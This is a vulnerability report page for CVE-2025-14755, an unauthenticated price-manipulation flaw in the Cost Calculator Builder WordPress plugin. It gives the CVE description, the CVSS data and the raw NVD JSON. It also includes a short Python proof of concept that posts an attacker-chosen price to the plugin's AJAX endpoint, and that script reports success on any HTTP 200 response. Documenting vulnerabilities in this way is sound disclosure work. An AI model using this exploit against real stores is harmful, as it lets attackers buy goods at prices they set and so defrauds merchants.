Security Vulnerability Report
中文
CVE-2025-14755 CVSS 5.3 MEDIUM

CVE-2025-14755

Published: 2026-05-13 05:16:12
Last Modified: 2026-05-13 14:43:47
Source: [email protected]

Description

The Cost Calculator Builder plugin for WordPress is vulnerable to Unauthenticated Price Manipulation and Insecure Direct Object Reference (IDOR) in all versions up to, and including, 4.0.1 only when used in combination with Cost Calculator Builder PRO. This is due to the ccb_woocommerce_payment AJAX action being registered via wp_ajax_nopriv, making it accessible to unauthenticated users, and the renderWooCommercePayment() function passing user-controlled data directly to CCBWooCheckout::init() without authorization checks. This makes it possible for unauthenticated attackers to add WooCommerce products to their cart with attacker-controlled prices.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cost Calculator Builder <= 4.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url = "http://example.com/wp-admin/admin-ajax.php" data = { "action": "ccb_woocommerce_payment", "product_id": "123", "price": "0.01" # Attacker controlled price } response = requests.post(target_url, data=data) if response.status_code == 200: print("[+] Exploit successful! Product added to cart with modified price.") else: print("[-] Exploit failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14755", "sourceIdentifier": "[email protected]", "published": "2026-05-13T05:16:12.470", "lastModified": "2026-05-13T14:43:46.717", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Cost Calculator Builder plugin for WordPress is vulnerable to Unauthenticated Price Manipulation and Insecure Direct Object Reference (IDOR) in all versions up to, and including, 4.0.1 only when used in combination with Cost Calculator Builder PRO. This is due to the ccb_woocommerce_payment AJAX action being registered via wp_ajax_nopriv, making it accessible to unauthenticated users, and the renderWooCommercePayment() function passing user-controlled data directly to CCBWooCheckout::init() without authorization checks. This makes it possible for unauthenticated attackers to add WooCommerce products to their cart with attacker-controlled prices."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBAjaxAction.php#L99", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBOrderController.php#L484", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fe684f43-8442-4b29-84a8-da8c6863e62b?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.